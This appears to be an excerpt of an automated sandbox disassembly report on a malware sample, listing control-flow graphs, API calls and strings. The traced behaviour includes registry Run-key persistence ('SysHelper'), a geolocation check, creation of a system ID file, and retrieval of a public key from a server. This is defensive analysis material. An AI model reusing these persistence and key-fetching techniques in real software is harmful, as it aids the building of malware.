                                                                                                                                                    control_flow_graph 2199 41bae0-41bb0d 2200 41bba0-41bba7 2199->2200 2201 41bb13 2199->2201 2202 41bf3d-41bf47 2200->2202 2203 41bbad-41bbae 2200->2203 2204 41bb15-41bb1a 2201->2204 2205 41bb54-41bb5e 2201->2205 2206 41bf49 2202->2206 2207 41bf5c-41bf63 2202->2207 2210 41bbb0-41bbd4 DefWindowProcW 2203->2210 2211 41bbd7-41bc45 call 420c62 GetComputerNameW call 413100 call 41ce80 2203->2211 2212 41bb47-41bb4f PostQuitMessage 2204->2212 2213 41bb1c-41bb1f 2204->2213 2208 41bf81-41bf97 2205->2208 2209 41bb64-41bb68 2205->2209 2214 41bf50-41bf54 2206->2214 2215 41bf65-41bf71 IsWindow 2207->2215 2216 41bf9a-41bfc2 DefWindowProcW 2207->2216 2217 41bb75-41bb9d DefWindowProcW 2209->2217 2218 41bb6a-41bb6e 2209->2218 2233 41bc47-41bc4c 2211->2233 2234 41bc7b-41bc80 2211->2234 2212->2208 2213->2208 2220 41bb25-41bb28 2213->2220 2214->2216 2222 41bf56-41bf5a 2214->2222 2215->2208 2223 41bf73-41bf7b DestroyWindow 2215->2223 2218->2209 2224 41bb70 2218->2224 2220->2210 2221 41bb2e-41bb31 2220->2221 2221->2208 2227 41bb37-41bb42 call 411cd0 2221->2227 2222->2207 2222->2214 2223->2208 2224->2208 2227->2215 2235 41bc5a-41bc76 call 4145a0 2233->2235 2236 41bc4e-41bc57 call 422587 2233->2236 2237 41bc82-41bc8b call 422587 2234->2237 2238 41bc8e-41bcb1 2234->2238 2235->2234 2236->2235 2237->2238 2242 41bcb3-41bcbc call 422587 2238->2242 2243 41bcbf-41bcf1 call 420bed 2238->2243 2242->2243 2250 41bcf7-41bcfa 2243->2250 2251 41befb-41bf0f IsWindow 2243->2251 2252 41bd00-41bd04 2250->2252 2253 41bf11-41bf18 2251->2253 2254 41bf28-41bf2d 2251->2254 2255 41bee5-41bef1 2252->2255 2256 41bd0a-41bd0e 2252->2256 2253->2254 2257 41bf1a-41bf22 DestroyWindow 2253->2257 2254->2208 2258 41bf2f-41bf3b call 422587 2254->2258 2255->2252 2261 41bef7-41bef9 2255->2261 2256->2255 2260 41bd14-41bd7b call 414690 * 2 call 40eff0 2256->2260 2257->2254 2258->2208 2269 41bee1 2260->2269 2270 41bd81-41be44 call 41c330 call 419d10 call 41c240 call 41b680 call 41b8b0 call 414690 call 41ce80 call 4131d0 2260->2270 2261->2251 2261->2254 2269->2255 2287 41be55-41be81 2270->2287 2288 41be46-41be52 call 422587 2270->2288 2290 41be83-41be8c call 422587 2287->2290 2291 41be8f-41bedf CreateThread 2287->2291 2288->2287 2290->2291 2291->2255
                                                                                                                                                    APIs
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                                                                    • _malloc.LIBCMT ref: 0041BBE4
                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                                                                    • _free.LIBCMT ref: 0041BCD7
                                                                                                                                                      • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                      • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                                                                      • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                      • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                      • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                      • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                    • IsWindow.USER32(?), ref: 0041BF69
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                                                                    • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3873257347-0
                                                                                                                                                    • Opcode ID: 14ecd2d046aada78ae42135a2d9541ee2a626e4fdbb5b4395bc3a5517ccddd62
                                                                                                                                                    • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                                                                    • Opcode Fuzzy Hash: 14ecd2d046aada78ae42135a2d9541ee2a626e4fdbb5b4395bc3a5517ccddd62
                                                                                                                                                    • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2295 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 2302 40cfb2-40cfb4 2295->2302 2303 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 2295->2303 2304 40d213-40d217 2302->2304 2308 40d000-40d01d 2303->2308 2306 40d224-40d236 2304->2306 2307 40d219-40d221 call 422587 2304->2307 2307->2306 2310 40d023-40d02c 2308->2310 2311 40d01f-40d021 2308->2311 2314 40d030-40d035 2310->2314 2313 40d039-40d069 call 4156d0 call 414300 2311->2313 2320 40d1cb 2313->2320 2321 40d06f-40d08b call 413010 2313->2321 2314->2314 2315 40d037 2314->2315 2315->2313 2323 40d1cd-40d1d1 2320->2323 2327 40d0b9-40d0bd 2321->2327 2328 40d08d-40d091 2321->2328 2325 40d1d3-40d1db call 422587 2323->2325 2326 40d1de-40d1f4 2323->2326 2325->2326 2330 40d201-40d20f 2326->2330 2331 40d1f6-40d1fe call 422587 2326->2331 2335 40d0cd-40d0e1 call 414300 2327->2335 2336 40d0bf-40d0ca call 422587 2327->2336 2332 40d093-40d09b call 422587 2328->2332 2333 40d09e-40d0b4 call 413d40 2328->2333 2330->2304 2331->2330 2332->2333 2333->2327 2335->2320 2346 40d0e7-40d149 call 413010 2335->2346 2336->2335 2349 40d150-40d15a 2346->2349 2350 40d160-40d162 2349->2350 2351 40d15c-40d15e 2349->2351 2353 40d165-40d16a 2350->2353 2352 40d16e-40d18b call 40b650 2351->2352 2357 40d19a-40d19e 2352->2357 2358 40d18d-40d18f 2352->2358 2353->2353 2354 40d16c 2353->2354 2354->2352 2357->2349 2360 40d1a0 2357->2360 2358->2357 2359 40d191-40d198 2358->2359 2359->2357 2362 40d1c7-40d1c9 2359->2362 2361 40d1a2-40d1a6 2360->2361 2363 40d1b3-40d1c5 2361->2363 2364 40d1a8-40d1b0 call 422587 2361->2364 2362->2361 2363->2323 2364->2363
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                    • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                                                                    Strings
                                                                                                                                                    • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                                                                    • "country_code":", xrefs: 0040CFE1
                                                                                                                                                    • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                    • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                    • API String ID: 1485416377-2962370585
                                                                                                                                                    • Opcode ID: 024b3a2441e03450481d723056a2cea3042cedec5767afe888cd0bf94bcd87ca
                                                                                                                                                    • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                                                                    • Opcode Fuzzy Hash: 024b3a2441e03450481d723056a2cea3042cedec5767afe888cd0bf94bcd87ca
                                                                                                                                                    • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2517 423576-42358f 2518 423591-42359b call 425208 call 4242d2 2517->2518 2519 4235a9-4235be call 42b420 2517->2519 2528 4235a0 2518->2528 2519->2518 2524 4235c0-4235c3 2519->2524 2526 4235d7-4235dd 2524->2526 2527 4235c5 2524->2527 2531 4235e9 call 42fb64 2526->2531 2532 4235df 2526->2532 2529 4235c7-4235c9 2527->2529 2530 4235cb-4235d5 call 425208 2527->2530 2533 4235a2-4235a8 2528->2533 2529->2526 2529->2530 2530->2528 2538 4235ee-4235fa call 42f803 2531->2538 2532->2530 2535 4235e1-4235e7 2532->2535 2535->2530 2535->2531 2541 423600-42360c call 42f82d 2538->2541 2542 4237e5-4237ef call 4242fd 2538->2542 2541->2542 2547 423612-42361e call 42f857 2541->2547 2547->2542 2550 423624-42362b 2547->2550 2551 42369b-4236a6 call 42f939 2550->2551 2552 42362d 2550->2552 2551->2533 2558 4236ac-4236af 2551->2558 2554 423637-423653 call 42f939 2552->2554 2555 42362f-423635 2552->2555 2554->2533 2562 423659-42365c 2554->2562 2555->2551 2555->2554 2560 4236b1-4236ba call 42fbb4 2558->2560 2561 4236de-4236eb 2558->2561 2560->2561 2570 4236bc-4236dc 2560->2570 2564 4236ed-4236fc call 4305a0 2561->2564 2565 423662-42366b call 42fbb4 2562->2565 2566 42379e-4237a0 2562->2566 2573 423709-423730 call 4304f0 call 4305a0 2564->2573 2574 4236fe-423706 2564->2574 2565->2566 2575 423671-423689 call 42f939 2565->2575 2566->2533 2570->2564 2583 423732-42373b 2573->2583 2584 42373e-423765 call 4304f0 call 4305a0 2573->2584 2574->2573 2575->2533 2580 42368f-423696 2575->2580 2580->2566 2583->2584 2589 423773-423782 call 4304f0 2584->2589 2590 423767-423770 2584->2590 2593 423784 2589->2593 2594 4237af-4237c8 2589->2594 2590->2589 2597 423786-423788 2593->2597 2598 42378a-423798 2593->2598 2595 4237ca-4237e3 2594->2595 2596 42379b 2594->2596 2595->2566 2596->2566 2597->2598 2599 4237a5-4237a7 2597->2599 2598->2596 2599->2566 2600 4237a9 2599->2600 2600->2594 2601 4237ab-4237ad 2600->2601 2601->2566 2601->2594
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 004235B1
                                                                                                                                                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                                                                    • __allrem.LIBCMT ref: 004236F3
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                                                                    • __allrem.LIBCMT ref: 00423726
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                                                                    • __allrem.LIBCMT ref: 0042375B
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1503770280-0
                                                                                                                                                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                    • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                                                                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                    • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                                                                    • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                                                                    • _memmove.LIBCMT ref: 0040C89F
                                                                                                                                                    • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                    • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                    • API String ID: 2864494435-54166481
                                                                                                                                                    • Opcode ID: 2afff864d23625b24f58fbefd098f6fdd5528c38845335be54e11011c5675fa6
                                                                                                                                                    • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                                                                    • Opcode Fuzzy Hash: 2afff864d23625b24f58fbefd098f6fdd5528c38845335be54e11011c5675fa6
                                                                                                                                                    • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(Shell32.dll,76474E90), ref: 0040F338
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                    • API String ID: 2574300362-2555811374
                                                                                                                                                    • Opcode ID: ca7cfa1228b3f8fdc2b8fd2ceafb28a1f081298cc6bea03699945706bdea330f
                                                                                                                                                    • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                                                                    • Opcode Fuzzy Hash: ca7cfa1228b3f8fdc2b8fd2ceafb28a1f081298cc6bea03699945706bdea330f
                                                                                                                                                    • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                                                                                                                                                    • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                                                                    • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseValue$OpenQuery
                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                    • API String ID: 3962714758-1667468722
                                                                                                                                                    • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                    • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                                                                    • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                    • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0041E707
                                                                                                                                                      • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                                                                    • InternetOpenW.WININET ref: 0041E743
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                                                                    • _memmove.LIBCMT ref: 0041E838
                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                                                                    • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                                                                    • _strstr.LIBCMT ref: 0041EA36
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                                                                    • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                                                                    • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                                                                    • _malloc.LIBCMT ref: 0041EB86
                                                                                                                                                    • _memset.LIBCMT ref: 0041EB94
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                                                                    • _strstr.LIBCMT ref: 0041EBDA
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                    • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                    • API String ID: 2805819797-1771568745
                                                                                                                                                    • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                                    • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                                                                    • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                                    • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • timeGetTime.WINMM(?,?,?,?,0041EE2F), ref: 00411B1E
                                                                                                                                                    • timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B29
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                                                                    • Sleep.KERNEL32(00000064,?,?,0041EE2F), ref: 00411B72
                                                                                                                                                    • timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B78
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3697694649-0
                                                                                                                                                    • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                                    • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                                                                    • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                                    • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
